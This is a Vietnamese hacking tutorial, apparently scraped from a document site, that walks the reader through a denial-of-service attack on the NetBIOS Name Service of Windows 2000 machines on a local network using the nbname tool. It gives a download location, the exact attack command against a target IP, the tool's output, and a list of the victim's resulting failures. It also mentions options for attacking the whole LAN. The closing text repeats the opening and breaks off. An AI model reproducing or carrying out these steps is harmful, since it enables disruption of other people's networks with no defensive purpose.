Đang tải... (xem toàn văn)
Tấn công DoS trong LAN
Tấn công DoS trong LANtrang này đã được đọc lần Từ trước tới giờ chắc các bạn chỉ nghe đến tấn công DoS trên internet , chứ chưa nghe đến DoS trên LAN đâu nhỉ.Có một tool giúp ta tấn công DoS vào dịch vụ NBNS (Net-BIOS Name Service) trên các máy dùng win2k trong LAN thông qua protocol NetBIOS. Lưu ý : trước khi dùng tool này , bạn phải ngắt service NetBIOS của protcol TCP/IP để tránh xung đột với service NBNS hiện tại ( coi chừng gậy ông đập lưng ông ;-) ).Rồi, bây giờ bạn download nbname tại download.tungxeng.net.ms. Unzip và thử tấn công thằng 192.168.234.222 xem sao (nbname chạy trong DOS):C:\nbname /astat 192.168.234.222 /conflictNBName v1.9 - Decodes and displays NetBIOS Name traffic (UDP 137), with optionsCopyright 2000: Sir Dystic, Cult of the Dead Cow -:|:- New Hack CitySend complaints, ideas and donations to sd@cultdeadcow.com|sd@newhackcity.netWinSock v2.0 (v2.2) WinSock 2.0WinSock status: RunningBound to port 137 on address 192.168.234.244Broadcast address 192.168.234.255 Netmask: 255.255.255.0**** NBSTAT QUERY packet sent to 192.168.234.222Waiting for packets .** Received 301 bytes from 192.168.234.222:137 via local netat Web Jun 20 15:46:12 200OPCode: QUERYFlags: Response AuthoratativeAnswerAnswer [0]:* <00>Node Status Resource Record:MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE MANDALAYFS <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE **** Name release sent to 192.168.234.222 Hậu quả của DoS đối với victim : 1. Kết nối mạng bị trục trặc2. Làm ngưng các chức năng mạng ( vd chức năng Network Neighborhood)3. Không dùng được chức năng net send4. Gặp trục trặc với kết nối domain5. Không thể truy cập được vào tài nguyên chia sẻ chung6. Hỏng sevice NetBIOS7. Dùng lệnh nbtstat -n sẽ gặp 1 bảng thông báo Conflict như sau :LAN:Node IpAddress: [192.168.234.222] Scope Id: []NetBIOS Local Name TableName Type Status--------------------------------------------------------------------MANDALAY <00> UNIQUE ConflictMANDALAYFS <00> GROUP RegisteredMANDALAYFS <1C> GROUP RegisteredMANDALAY <20> UNIQUE ConflictMANDALAYFS <1E> GROUP RegisteredMANDALAY <1D> UNIQUE Conflict Bạn có thể tấn công tòan mạng LAN bằng cách thêm các tham số /QUERY , /DENY .Bạn gõ nbname / ? để tham khảo thêm các tham số kèm theo của nbname. . Tấn công DoS trong LANtrang này đã được đọc lần Từ trước tới giờ chắc các bạn chỉ nghe đến tấn công DoS trên internet , chứ chưa nghe đến DoS trên LAN. trên LAN đâu nhỉ.Có một tool giúp ta tấn công DoS vào dịch vụ NBNS (Net-BIOS Name Service) trên các máy dùng win2k trong LAN thông qua protocol NetBIOS. Lưu